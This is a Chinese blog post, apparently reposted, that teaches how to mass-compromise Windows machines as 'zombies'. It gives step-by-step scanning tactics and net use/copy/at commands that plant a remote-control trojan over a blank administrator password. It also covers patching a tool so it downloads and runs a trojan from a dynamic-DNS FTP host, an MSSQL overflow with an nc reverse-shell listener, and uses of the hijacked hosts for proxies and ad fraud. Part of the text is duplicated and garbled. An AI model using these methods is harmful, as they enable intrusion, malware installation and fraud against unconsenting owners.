学入侵-抓肉机

张开发
2026/4/7 2:08:22 15 分钟阅读

分享文章

学入侵-抓肉机
学入侵-抓肉机**一、**学入侵,抓肉机—环境搭建篇内容【1】入侵! 我们究竟需要怎样的环境(可选择的环境-最大程度上利于入侵的环境)可选择的操作系统Windows NT/2000(ProServerAdvanced Server)/XP(ProHome)/2003/vista系统部署方法之推荐1)直接在真实机上安装双系统(WinXP PROWin2000 Server/Win2003 Server)2)在真实机上安装单系统后安装虚拟机程序并虚拟出各种系统环境。【2】使用虚拟机系统与真实机系统入侵的区别单从入侵的角度而言本质区别不大最终要实现的目的都是一致的。但如果从是否能够最大化的发挥计算机软硬件性能的角度分析则使用真实机系统才是最佳的选择。(举例说明直接在真实机的Win2000中执行扫描 VS 在虚拟机Win2000中执行扫描)【3】入侵时的无奈入侵工具对操作系统的挑剔往往表现为对某操作平台的不支持或是与操作系统中某组件、某个补丁的不兼容等。 所以选择一个通用性较强的且系统状态持续保持在最原始的操作系统就显得尤为重要了(不打任何官方发布的补丁或是安装影响系统功能的程序)。课程小结入侵是目的为了达到这个目的事先一定要做好各项准备。搭建一个能够最大化发挥计算机软硬件性能的、通用性较强的、最大程度上利于入侵的环境是入侵准备工作中的第一步也是整个入侵过程中的重要环节之一。【4】在虚拟机系统中完成针对入侵环境的部署1常用入侵工具的部署扫描类、溢出类、提权类、破解类、攻击类等2使用肉机或VPN代理来突破本地电信运营商作出的网络限制端口的封锁(135号端口)、IP访问限制等3将部署好的入侵环境做成虚拟机快照二、学入侵,抓肉机—扫描【1】常见端口扫描工具的使用【2】扫描的优化处理有目的的扫描才算是有价值的扫描扫描的过程也许是短暂的也许会花费很长时间而优化扫描的意义在于最大化的缩短扫描时间最大化的发挥扫描结果的价值。1定位活跃IP段千万不要怕麻烦这一步总体上决定了最终能够成功入侵的肉机的数量也决定了你能在此刻就能得到这台肉机还是在1小时后。 (影响扫描效率的关键步骤)2反复扫描往往一些个人计算机所组成的网络最大程度上构成了活跃IP的范围如果你扫描的服务所对应的端口(如135号)正是针对个人计算机的那么在上网的高峰时间里进行反复扫描会让你收获颇丰。(反复扫描是充分利用活跃IP段资源的体现但一定要把握好扫描时间和周期)3扫描结果的多向利用如果对5万台开着1433端口号的扫描结果仅使用sqlhello溢出的方法入侵过后就丢掉这些扫描结果的话只能说太浪费了你完全可以再去扫描一下它们中存在有SQL弱口令的机器。4端口组合筛选扫描如果你想快速得到一台3389肉机的话你完全可以在已扫出开着1433端口计算机的结果中去筛选当然你也可以不去筛选这样你将有机会自己动手开启一些服务器的终端服务。【3】漏洞产生的原因、漏洞的分类、典型漏洞举例1哪儿来的漏洞1)操作系统自身存在的2)应用软件中存在的2为什么会有漏洞1)人为因素2)非人为因素3漏洞的分类1)口令薄弱类2)程序设计缺陷类(0Day/缓冲区溢出)4典型(流行)的漏洞1)(操作系统)口令类135(Wmi)、139(Ipc) 、 3389 ( T S ) ∗ ∗ ∗ ∗ 2 ) ( 操作系统 ) 溢出类 ∗ ∗ ∗ ∗ 42 ( W i n s ) 、 53 ( D n s ) 、 135 ( D c o m ) ∗ ∗ ∗ ∗ 3 ) ( 应用软件 ) 口令类 ∗ ∗ ∗ ∗ 4899 ( R a d m i n ) 、 5900 ( V n c ) 、 8080 ( A p a c h e T o m c a t ) ∗ ∗ ∗ ∗ 4 ) ( 应用软件 ) 溢出类 ∗ ∗ ∗ ∗ 21 ( S e r v − U ) 、 1433 ( M S S q l ) 、 2967 ( N o r t o n A n t i V i r u s ) ∗ ∗ ∗ ∗ 【 4 】哪些端口扫描的价值较大能够被入侵的成功率较高 ∗ ∗ ∗ ∗ 1 操作系统 ∗ ∗ ∗ ∗ 21 ( M S F t p ) 、 135 ∗ ∗ ∗ ∗ 2 第三方 ∗ ∗ ∗ ∗ 21 ( S e r v − U ) 、 1433 、 4899 、 5900 、 8080 ∗ ∗ ∗ ∗ 【 5 】扫描方法分类 ∗ ∗ ∗ ∗ 1 全 T C P 连接 ∗ ∗ ∗ ∗ 这种扫描方法使用三次握手与目标计算机建立标准的 T C P 连接扫描的结果准确性较高但扫描速度较慢。还需要强调的是这种古老的扫描方法很容易被目标主机记录下来。 ∗ ∗ ∗ ∗ 2 半开式扫描 ( S Y N 扫描 ) ∗ ∗ ∗ ∗ 在这种扫描技术中扫描主机自动向目标计算机的指定端口发送 S Y N 数据段表示发送建立连接请求。由于扫描过程中全连接尚未建立所以大大降低了被目标计算机的记录的可能性并且加快了扫描的速度。 ∗ ∗ ∗ ∗ 小结扫描看似简单但实际上其中有很多学问。高效率的扫描要做到知道扫描什么最有意义、掌握正确的扫描方法、最大化的发挥扫描结果的价值。 ∗ ∗ ∗ ∗ 三、学入侵 , 抓肉机 − − − 入侵 ∗ ∗ ∗ ∗ 【 1 】入侵的原则决不在一台主机上花费过多的时间决不在入侵的主机上搞破坏 ∗ ∗ ∗ ∗ 【 2 】实例入侵演示 − 135 端口空口令入侵 ∗ ∗ ∗ ∗ 用到的工具 S 扫描器、 135 抓鸡工具、 C 32 A s m 反汇编工具、 N t S c a n 扫描器、 R e c t o n . e x e 、 P c s h a r e 远控木马软件、 F T P S e r v e r 。 3322. o r g 免费动态域名。 ∗ ∗ ∗ ∗ 方法 ∗ ∗ ∗ ∗ 1 ∗ ∗ ∗ ∗ ∗ ∗ ∗ ∗ 用 ∗ ∗ ∗ ∗ N t s c a n ∗ ∗ ∗ ∗ 1 、 ∗ ∗ ∗ ∗ S ∗ ∗ ∗ ∗ 扫描器扫描开放 135 端口的 I P 地址并且整理放在 i p . t x t 文件中。 ∗ ∗ ∗ ∗ 2 、 ∗ ∗ ∗ ∗ 用 n t s c a n 从这些 I P 扫描出弱口令。 ∗ ∗ ∗ ∗ 3 、 ∗ ∗ ∗ ∗ 用管理员建立 I P C 连接 ∗ ∗ ∗ ∗ n e t u s e / / 192.168.1.248 / i p c )、3389(TS)** **2)(操作系统)溢出类** **42(Wins)、53(Dns)、135(Dcom)** **3)(应用软件)口令类** **4899(Radmin)、5900(Vnc)、8080(ApacheTomcat)** **4)(应用软件)溢出类** **21(Serv-U)、1433(MSSql)、2967(NortonAntiVirus)** **【4】哪些端口扫描的价值较大能够被入侵的成功率较高** **1操作系统** **21(MSFtp)、135** **2第三方** **21(Serv-U)、1433、4899、5900、8080** **【5】扫描方法分类** **1全TCP连接** **这种扫描方法使用三次握手与目标计算机建立标准的TCP连接扫描的结果准确性较高但扫描速度较慢。还需要强调的是这种古老的扫描方法很容易被目标主机记录下来。** **2半开式扫描(SYN扫描)** **在这种扫描技术中扫描主机自动向目标计算机的指定端口发送SYN数据段表示发送建立连接请求。由于扫描过程中全连接尚未建立所以大大降低了被目标计算机的记录的可能性并且加快了扫描的速度。** **小结扫描看似简单但实际上其中有很多学问。高效率的扫描要做到知道扫描什么最有意义、掌握正确的扫描方法、最大化的发挥扫描结果的价值。** **三、学入侵,抓肉机---入侵** **【1】入侵的原则决不在一台主机上花费过多的时间决不在入侵的主机上搞破坏** **【2】实例入侵演示-135端口空口令入侵** **用到的工具 S扫描器、135抓鸡工具、C32Asm反汇编工具、NtScan扫描器、Recton.exe、Pcshare远控木马软件、FTPServer。3322.org免费动态域名。** **方法** **1** **** **用** **Ntscan** **1、** **S** **扫描器扫描开放135端口的IP地址并且整理放在ip.txt文件中。** **2、** **用ntscan从这些IP扫描出弱口令。** **3、** **用管理员建立IPC连接** **net use //192.168.1.248/ipc)、3389(TS)∗∗∗∗2)(操作系统)溢出类∗∗∗∗42(Wins)、53(Dns)、135(Dcom)∗∗∗∗3)(应用软件)口令类∗∗∗∗4899(Radmin)、5900(Vnc)、8080(ApacheTomcat)∗∗∗∗4)(应用软件)溢出类∗∗∗∗21(Serv−U)、1433(MSSql)、2967(NortonAntiVirus)∗∗∗∗【4】哪些端口扫描的价值较大能够被入侵的成功率较高∗∗∗∗1操作系统∗∗∗∗21(MSFtp)、135∗∗∗∗2第三方∗∗∗∗21(Serv−U)、1433、4899、5900、8080∗∗∗∗【5】扫描方法分类∗∗∗∗1全TCP连接∗∗∗∗这种扫描方法使用三次握手与目标计算机建立标准的TCP连接扫描的结果准确性较高但扫描速度较慢。还需要强调的是这种古老的扫描方法很容易被目标主机记录下来。∗∗∗∗2半开式扫描(SYN扫描)∗∗∗∗在这种扫描技术中扫描主机自动向目标计算机的指定端口发送SYN数据段表示发送建立连接请求。由于扫描过程中全连接尚未建立所以大大降低了被目标计算机的记录的可能性并且加快了扫描的速度。∗∗∗∗小结扫描看似简单但实际上其中有很多学问。高效率的扫描要做到知道扫描什么最有意义、掌握正确的扫描方法、最大化的发挥扫描结果的价值。∗∗∗∗三、学入侵,抓肉机−−−入侵∗∗∗∗【1】入侵的原则决不在一台主机上花费过多的时间决不在入侵的主机上搞破坏∗∗∗∗【2】实例入侵演示−135端口空口令入侵∗∗∗∗用到的工具S扫描器、135抓鸡工具、C32Asm反汇编工具、NtScan扫描器、Recton.exe、Pcshare远控木马软件、FTPServer。3322.org免费动态域名。∗∗∗∗方法∗∗∗∗1∗∗∗∗∗∗∗∗用∗∗∗∗Ntscan∗∗∗∗1、∗∗∗∗S∗∗∗∗扫描器扫描开放135端口的IP地址并且整理放在ip.txt文件中。∗∗∗∗2、∗∗∗∗用ntscan从这些IP扫描出弱口令。∗∗∗∗3、∗∗∗∗用管理员建立IPC连接∗∗∗∗netuse//192.168.1.248/ipc“” /user:administrator4、 查看远程服务器的时间net time //192.168.1.2485、把配置好的pcshare木马拷贝到远程服务器上。copy c:/server.exe //192.168.1.248/c$6、 用at命令计划运行木马文件。at //192.168.1.248 14:29 c:/server.exe7、查看计划任务有没有运行at //192.168.1.2488、打开远程控制软件pcshare,看主机有没有上线。或者用Recton.exe工具强制开启对方的Telnet服务开启了Telnet服务后面什么事情都好做了。方法2:135自动抓鸡工具(只能自动抓空口令电脑)1、用c32工具修改vip.exe文件自动下载并且运行木马FTP服务器为:hyhu.3322.org,用户名123密码123木马名为1.exe如果运行vip.exe出错请安装Microsoft.NET Framework 2.02、配置一个FTP服务器并且新一个用户123密码123。3、配置一个木马名为1.exe并放在FTP用户123目录下。4、申请一个免费的域名hyhu.3322.org,并且设定解析为你的FTP服务器的IP地址。5、修改ip.txt文件把要扫描的网段输在里面格式210.1.1.1 210.1.255.2546、运行批处理文件”135端口自动批量抓鸡 2003版.bat”7、通过FTP服务器查看有多少IP下载了木马也可以打开木马远控软件看有多少肉鸡上线。【3】实例入侵演示-1433(MSSQL)端口弱口令入侵scan扫描器、sql查询分析器、SQLtools.exe、Pcshare远控木马软件。1、在scan目录中的ip.txt输入要扫描的IP地址。2、运行scan目录中的scan.bat批处理文件开始扫描开放了1433端口服务器并且扫描sa为弱口令的服务器。默认用tcp扫描可以修改批处理改为syn扫描。3、运行SQLTools.exe工具软件连接弱口令的服务器。4、连接成功后可以点击“利用目录”—“执行DOS命令”。5、能够成功执行DOS命令后后面什么事都可以做了方法也很多。【4】实例入侵演示-1433(MSSQL)端口缓冲区溢出入侵1、运行overflow目录下的nc.bat,作用运行nc,并且开启1234端口监听。此端口可以改不要冲就OK。2、修改1433.bat文件IP输入你的公网IP地址端口和nc.bat定义的端口一样。3、运行1433.bat根据cleanupips.txt里面的IP地址自动SQL溢出。cleanupips.txt里面的IP地址是前面扫描到开放1433端口的服务器。四、学入侵,抓肉机—肉鸡利用【1】利用肉机抓肉机(推荐进行时间深夜)【2】利用肉机做代理Socks/HTTP VPN【3】利用肉机做网赚挂程序、刷广告五、学入侵,抓肉机—学习方向指导【1】入侵没有具体的方法和思路【2】入侵的动机与意义1纯属好奇觉得好玩2觉得这样很酷别人知道了会对自己刮目相看3锻炼技术增长见识4职业黑客为了达到商业目的。【3】入侵的底线绝不搞破坏“点”到即止。【4】学习方向操作系统、编程、脚本、破解、病毒……【5】学习目标熟悉各种操作系统、能够独立发现程序漏洞(0Day**)、能够按需编写程序。备注所用到的工具已经上传到附件里面工具有可能被病毒查杀但可以放心使用。**附件http://down.51cto.com/data/2354553本文转自成功不仅是个人荣誉更是对家人责任博客51CTO博客原文链接http://blog.51cto.com/hukunlin/229472如需转载请自行联系原作者kunlin/_hu《网络安全从零到精通全套学习大礼包》96节从入门到精通的全套视频教程免费领取如果你也想通过学网络安全技术去帮助就业和转行我可以把我自己亲自录制的96节 从零基础到精通的视频教程以及配套学习资料无偿分享给你。网络安全学习路线图想要学习 网络安全作为新手一定要先按照路线图学习方向不对努力白费。对于从来没有接触过网络安全的同学我帮大家准备了从零基础到精通学习成长路线图以及学习规划。可以说是最科学最系统的学习路线大家跟着这个路线图学习准没错。配套实战项目/源码所有视频教程所涉及的实战项目和项目源码学习电子书籍学习网络安全必看的书籍和文章的PDF市面上网络安全书籍确实太多了这些是我精选出来的面试真题/经验以上资料如何领取文章来自网上侵权请联系博主

更多文章